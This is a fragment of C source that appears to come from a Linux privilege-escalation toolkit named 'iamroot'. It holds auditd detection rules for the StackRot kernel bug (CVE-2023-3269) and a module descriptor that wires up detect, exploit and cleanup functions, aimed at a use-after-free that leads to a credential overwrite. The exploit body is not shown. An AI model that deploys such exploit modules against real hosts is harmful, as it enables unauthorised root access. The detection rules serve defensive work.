"# stacks, combined with unshare(CLONE_NEWUSER). Each individual call\n"
"# is benign — flag the *combination* by correlating these keys with a\n"
"# subsequent kernel oops or KASAN message in dmesg.\n"
"-a always,exit -F arch=b64 -S unshare -k iamroot-stackrot-userns\n"
"-a always,exit -F arch=b64 -S mremap -k iamroot-stackrot-mremap\n"
"-a always,exit -F arch=b64 -S mprotect -k iamroot-stackrot-mprotect\n"
"-a always,exit -F arch=b64 -S munmap -F success=1 -k iamroot-stackrot-munmap\n";
/* Registry descriptor for the StackRot module.
 *
 * `kernel_range` is the human-readable counterpart of the patched-branch
 * table used by stackrot_detect(): the bug is present from 6.1 through
 * 6.4.0 and was fixed in 6.1.37, 6.3.11 and 6.4.1 (mainline 6.5-rc1).
 * No mitigation hook and no sigma/yara/falco rules are provided; only
 * the auditd rule text is exported. */
const struct iamroot_module stackrot_module = {
    .name          = "stackrot",
    .cve           = "CVE-2023-3269",
    .summary       = "maple-tree VMA-split UAF (StackRot) → kernel R/W → cred overwrite",
    .family        = "stackrot",
    .kernel_range  = "6.1 ≤ K ≤ 6.4.0, fixed in: 6.1.37 (LTS) / 6.3.11 / 6.4.1 / mainline 6.5-rc1",
    .detect        = stackrot_detect,
    .exploit       = stackrot_exploit,
    .mitigate      = NULL,
    .cleanup       = stackrot_cleanup,
    .detect_auditd = stackrot_auditd,
    .detect_sigma  = NULL,
    .detect_yara   = NULL,
    .detect_falco  = NULL,
};
/* Public registration hook: hands stackrot_module to the core registry
* through iamroot_register(). Takes no arguments and returns nothing. */
void iamroot_register_stackrot(void)
{
iamroot_register(&stackrot_module);
}